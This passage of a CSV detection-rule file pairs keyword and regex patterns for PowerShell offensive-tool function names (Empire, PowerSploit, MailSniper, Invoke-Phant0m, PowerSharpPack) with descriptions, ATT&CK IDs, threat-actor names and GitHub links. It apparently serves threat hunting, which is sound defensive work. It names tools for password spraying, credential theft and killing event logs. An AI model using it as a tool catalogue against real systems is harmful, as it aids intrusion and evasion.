cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-noPac.*",".{0,1000}Invoke\-noPac\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","1","59","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*Invoke-NTDS.ps1*",".{0,1000}Invoke\-NTDS\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-NTLMAuth.ps1*",".{0,1000}Invoke\-NTLMAuth\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-Ntsd.ps1*",".{0,1000}Invoke\-Ntsd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Obfuscation -ScriptPath *",".{0,1000}Invoke\-Obfuscation\s\-ScriptPath\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" 
"*Invoke-Obfuscation*",".{0,1000}Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3517","748","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" "*Invoke-Obfuscation.psd1*",".{0,1000}Invoke\-Obfuscation\.psd1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Invoke-OpenInboxFinder*",".{0,1000}Invoke\-OpenInboxFinder.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-OpenOWAMailboxInBrowser*",".{0,1000}Invoke\-OpenOWAMailboxInBrowser.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Oxidresolver*",".{0,1000}Invoke\-Oxidresolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" 
"*Invoke-P0wnedshell*",".{0,1000}Invoke\-P0wnedshell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-P0wnedshellx86*",".{0,1000}Invoke\-P0wnedshellx86.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-PacketKnock*",".{0,1000}Invoke\-PacketKnock.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Pandemonium -Command*",".{0,1000}Invoke\-Pandemonium\s\-Command.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Pandemonium.ps1*",".{0,1000}Invoke\-Pandemonium\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Paranoia*",".{0,1000}Invoke\-Paranoia.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Paranoia*",".{0,1000}Invoke\-Paranoia.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-PasswordSpray*",".{0,1000}Invoke\-PasswordSpray.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 
T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayEAS*",".{0,1000}Invoke\-PasswordSprayEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayEWS*",".{0,1000}Invoke\-PasswordSprayEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayGmail*",".{0,1000}Invoke\-PasswordSprayGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayOWA*",".{0,1000}Invoke\-PasswordSprayOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-Patamenia.ps1*",".{0,1000}Invoke\-Patamenia\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (specific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. 
I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - 